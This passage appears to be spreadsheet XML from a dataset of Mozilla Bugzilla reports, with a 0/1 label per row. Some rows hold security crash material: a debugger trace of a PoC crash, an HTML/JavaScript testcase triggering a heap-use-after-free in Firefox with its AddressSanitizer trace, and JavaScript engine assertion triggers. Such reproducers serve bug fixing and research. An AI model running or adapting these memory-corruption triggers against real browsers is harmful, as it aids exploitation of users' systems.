cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\MOZCRT19.dll -
MOZCRT19!memmove+0x5a:
7815023a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll -
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012f694 100eab13 MOZCRT19!memmove+0x5a
0012f6b0 1076138d xul!gfxIntSize::gfxIntSize+0x49d7
0012f6d0 107613bf xul!gfxFontTestStore::NewStore+0x6cff
00000000 00000000 xul!gfxFontTestStore::NewStore+0x6d31
When you check the POC, you can found a lot of no-use things, these things just make the file size &gt; 26k , To reproduce this case, maybe you need make your PC slowly and refresh some times ,haha. I can give you the dump file If you need .
wushi</t>
        </is>
      </c>
      <c r="X3517" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3518">
      <c r="A3518" t="n">
        <v>2614</v>
      </c>
      <c r="B3518" t="inlineStr">
        <is>
          <t>1999-01-25 16:30:44 -0800</t>
        </is>
      </c>
      <c r="C3518" t="inlineStr">
        <is>
          <t>Jan25: Crash loading www.infoworld.com</t>
        </is>
      </c>
      <c r="D3518" t="inlineStr">
        <is>
          <t>2008-07-31 01:15:51 -0700</t>
        </is>
      </c>
      <c r="E3518" t="n">
        <v>1</v>
      </c>
      <c r="F3518" t="n">
        <v>1</v>
      </c>
      <c r="G3518" t="n">
        <v>6</v>
      </c>
      <c r="H3518" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3518" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3518" t="inlineStr">
        <is>
          <t>Viewer App</t>
        </is>
      </c>
      <c r="K3518" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3518" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N3518" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3518" t="inlineStr"/>
      <c r="Q3518" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3518" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3518" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3518" t="n">
        <v>1</v>
      </c>
      <c r="U3518" t="n">
        <v>0</v>
      </c>
      <c r="V3518" t="n">
        <v>4</v>
      </c>
      <c r="W3518" t="inlineStr">
        <is>
          <t>Works fine on 4.51.  Get app error window (soft crash) using Jan25 build on
win95</t>
        </is>
      </c>
      <c r="X3518" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3519">
      <c r="A3519" t="n">
        <v>1343795</v>
      </c>
      <c r="B3519" t="inlineStr">
        <is>
          <t>2017-03-02 00:44:55 -0800</t>
        </is>
      </c>
      <c r="C3519" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::Selection::ScrollIntoView</t>
        </is>
      </c>
      <c r="D3519" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:49 -0700</t>
        </is>
      </c>
      <c r="E3519" t="n">
        <v>1</v>
      </c>
      <c r="F3519" t="n">
        <v>1</v>
      </c>
      <c r="G3519" t="n">
        <v>3</v>
      </c>
      <c r="H3519" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3519" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3519" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K3519" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3519" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3519" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q3519" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3519" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3519" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3519" t="n">
        <v>1</v>
      </c>
      <c r="U3519" t="n">
        <v>0</v>
      </c>
      <c r="V3519" t="n">
        <v>18</v>
      </c>
      <c r="W3519" t="inlineStr">
        <is>
          <t>The following testcases crashes the latest ASAN build of Firefox. The testcase requires the fuzzPriv extension.
&lt;script&gt;
function start() {
        o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        document.body.appendChild(o0);
        o1=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o1.addEventListener('load', fun0,false);
        document.body.appendChild(o1);
}
function fun0() {
        o6=o1.contentDocument;
        o72=document.createElementNS('http://www.w3.org/1999/xhtml','input');
        o0.remove();
        o82=document.createElementNS('http://www.w3.org/1999/xhtml','form');
        o6.documentElement.appendChild(o82);
        o82.appendChild(o72);
        o72.select();
        o1.contentWindow.onresize=fun1;
        o1.width='8px';
}
function fun1() {
        o72.replaceWith("");
        window.fuzzPriv.CC();
        window.fuzzPriv.CC();
        window.setTimeout("location.reload()",4);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==18823==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000ace50 at pc 0x7fafead00404 bp 0x7ffe4bdc52d0 sp 0x7ffe4bdc52c8
READ of size 8 at 0x60d0000ace50 thread T0 (Web Content)
    #0 0x7fafead00403 in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:307:45
    #1 0x7fafead00403 in mozilla::dom::Selection::ScrollIntoView(short, nsIPresShell::ScrollAxis, nsIPresShell::ScrollAxis, int) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6163
    #2 0x7fafead2b339 in mozilla::dom::Selection::ScrollSelectionIntoViewEvent::Run() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6072:3
    #3 0x7fafe3f70812 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #4 0x7fafe3f6d0c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #5 0x7fafe4d8babf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #6 0x7fafe4cfce58 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #7 0x7fafe4cfce58 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #8 0x7fafe4cfce58 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #9 0x7fafea158cff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #10 0x7fafed9b13a7 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:852:12
    #11 0x7fafe4cfce58 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #12 0x7fafe4cfce58 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #13 0x7fafe4cfce58 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #14 0x7fafed9b0e8c in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:684:7
    #15 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #16 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #17 0x7fafff38d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x60d0000ace50 is located 80 bytes inside of 136-byte region [0x60d0000ace00,0x60d0000ace88)
freed by thread T0 (Web Content) here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fafe3e0d904 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7fafe3e0d4f6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7fafe3e147d6 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3825:3
    #4 0x7fafe3e13fb0 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3650:9
    #5 0x7fafe3e16d4c in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4143:3
    #6 0x7fafe6a8a76f in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
    #7 0x7fafe65e15fd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7fafe3f8bd31 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7fafe5764c47 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7fafe5764c47 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7fafe5764c47 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7fafe576c5bb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7fafede2343f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7fafede2343f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #15 0x7fafede09d60 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #16 0x7fafede09d60 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955
    #17 0x7fafeddef08b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7fafede23756 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #19 0x7fafede23e32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #20 0x7fafee7f33b3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2819:12
    #21 0x7fafe56a39d9 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7fafede2343f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7fafede2343f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #24 0x7fafede09d60 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #25 0x7fafede09d60 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955
    #26 0x7fafeddef08b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7fafede23756 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #28 0x7fafede23e32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #29 0x7fafeea96dfc in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7fafeea4d04e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #31 0x7fafeea768b9 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #32 0x7fafeea791e4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7fafede234e7 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7fafede234e7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7fafede23e32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7fafee7f516c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fafeacf91c9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fafeacf91c9 in nsFrameSelection::nsFrameSelection() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:537
    #4 0x7fafe8be288b in nsTextEditorState::BindToFrame(nsTextControlFrame*) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1170:43
    #5 0x7fafeae1b6e4 in nsTextControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/forms/nsTextControlFrame.cpp:332:17
    #6 0x7fafea978277 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4207:17
    #7 0x7fafea96c3ed in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10909:3
    #8 0x7fafea98130e in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4062:9
    #9 0x7fafea98c286 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6209:3
    #10 0x7fafea96d1b4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10705:5
    #11 0x7fafea96d1b4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10994
    #12 0x7fafea975c73 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12004:3
    #13 0x7fafea984cf5 in ConstructNonScrollableBlockWithConstructor /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4950:3
    #14 0x7fafea984cf5 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4914
    #15 0x7fafea980229 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3881:7
    #16 0x7fafea98c286 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6209:3
    #17 0x7fafea99a67b in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10705:5
    #18 0x7fafea99a67b in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7564
    #19 0x7fafea994f48 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7183:5
    #20 0x7fafea8a9042 in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:464:3
    #21 0x7fafea8f4970 in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #22 0x7fafea8f4970 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4137
    #23 0x7fafe699deae in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5
    #24 0x7fafe699deae in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7984
    #25 0x7fafe69e64be in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1550:3
    #26 0x7fafe69e2b5c in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1180:41
    #27 0x7fafe69e5efe in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:484:3
    #28 0x7fafe8a33008 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3721:7
    #29 0x7fafe811cd60 in mozilla::dom::HTMLInputElementBinding::select(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2856:3
    #30 0x7fafe8325787 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #31 0x7fafede2343f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #32 0x7fafede2343f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #33 0x7fafede23e32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #34 0x7fafeea96dfc in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #35 0x7fafeea4d04e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #36 0x7fafeea768b9 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:307:45 in operator bool
Shadow bytes around the buggy address:
  0x0c1a8000d970: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000d980: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a8000d990: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a8000d9a0: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000d9b0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
=&gt;0x0c1a8000d9c0: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd
  0x0c1a8000d9d0: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
  0x0c1a8000d9e0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1a8000d9f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a8000da00: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
  0x0c1a8000da10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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8823==ABORTING</t>
        </is>
      </c>
      <c r="X3519" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3520">
      <c r="A3520" t="n">
        <v>1152243</v>
      </c>
      <c r="B3520" t="inlineStr">
        <is>
          <t>2015-04-08 03:00:41 -0700</t>
        </is>
      </c>
      <c r="C3520" t="inlineStr">
        <is>
          <t>[Super Search] Add an icon to links that add terms to the current search</t>
        </is>
      </c>
      <c r="D3520" t="inlineStr">
        <is>
          <t>2016-11-16 21:12:32 -0800</t>
        </is>
      </c>
      <c r="E3520" t="n">
        <v>1</v>
      </c>
      <c r="F3520" t="n">
        <v>1</v>
      </c>
      <c r="G3520" t="n">
        <v>4</v>
      </c>
      <c r="H3520" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3520" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3520" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3520" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3520" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3520" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3520" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3520" t="inlineStr"/>
      <c r="Q3520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3520" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3520" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3520" t="n">
        <v>1</v>
      </c>
      <c r="U3520" t="n">
        <v>0</v>
      </c>
      <c r="V3520" t="n">
        <v>16</v>
      </c>
      <c r="W3520" t="inlineStr">
        <is>
          <t>On a suggestion of Tchanders: 
&gt; Perhaps it would make more sense to add icons (e.g. a plus) to the left of the search terms, to indicate that they are not links, but filters?</t>
        </is>
      </c>
      <c r="X3520" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3521">
      <c r="A3521" t="n">
        <v>566136</v>
      </c>
      <c r="B3521" t="inlineStr">
        <is>
          <t>2010-05-15 08:42:19 -0700</t>
        </is>
      </c>
      <c r="C3521" t="inlineStr">
        <is>
          <t>Assertion failure: isNative() after global.__proto__ = []</t>
        </is>
      </c>
      <c r="D3521" t="inlineStr">
        <is>
          <t>2013-03-20 08:36:21 -0700</t>
        </is>
      </c>
      <c r="E3521" t="n">
        <v>1</v>
      </c>
      <c r="F3521" t="n">
        <v>1</v>
      </c>
      <c r="G3521" t="n">
        <v>3</v>
      </c>
      <c r="H3521" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3521" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3521" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3521" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L3521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3521" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3521" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey [critsmash:patch]</t>
        </is>
      </c>
      <c r="Q3521" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3521" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3521" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3521" t="n">
        <v>1</v>
      </c>
      <c r="U3521" t="n">
        <v>0</v>
      </c>
      <c r="V3521" t="n">
        <v>24</v>
      </c>
      <c r="W3521" t="inlineStr">
        <is>
          <t>The following scripts gives an assert in debug builds:
~/m/tm/js/src&gt; cat ~/s/x.js
this.__proto__ = [];
print(length);
~/m/tm/js/src&gt; ~/build/js/tdbg/js ~/s/x.js
Assertion failure: isNative(), at /home/igor/m/tm/js/src/jsscope.h:549
Aborted</t>
        </is>
      </c>
      <c r="X3521" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3522">
      <c r="A3522" t="n">
        <v>427196</v>
      </c>
      <c r="B3522" t="inlineStr">
        <is>
          <t>2008-04-05 01:06:55 -0700</t>
        </is>
      </c>
      <c r="C3522" t="inlineStr">
        <is>
          <t>"Assertion failure: OBJ_SCOPE(pobj)-&gt;object == pobj" with __proto__, __defineSetter__</t>
        </is>
      </c>
      <c r="D3522" t="inlineStr">
        <is>
          <t>2009-08-18 01:40:41 -0700</t>
        </is>
      </c>
      <c r="E3522" t="n">
        <v>1</v>
      </c>
      <c r="F3522" t="n">
        <v>1</v>
      </c>
      <c r="G3522" t="n">
        <v>3</v>
      </c>
      <c r="H3522" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3522" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3522" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3522" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3522" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3522" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3522" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3522" t="inlineStr">
        <is>
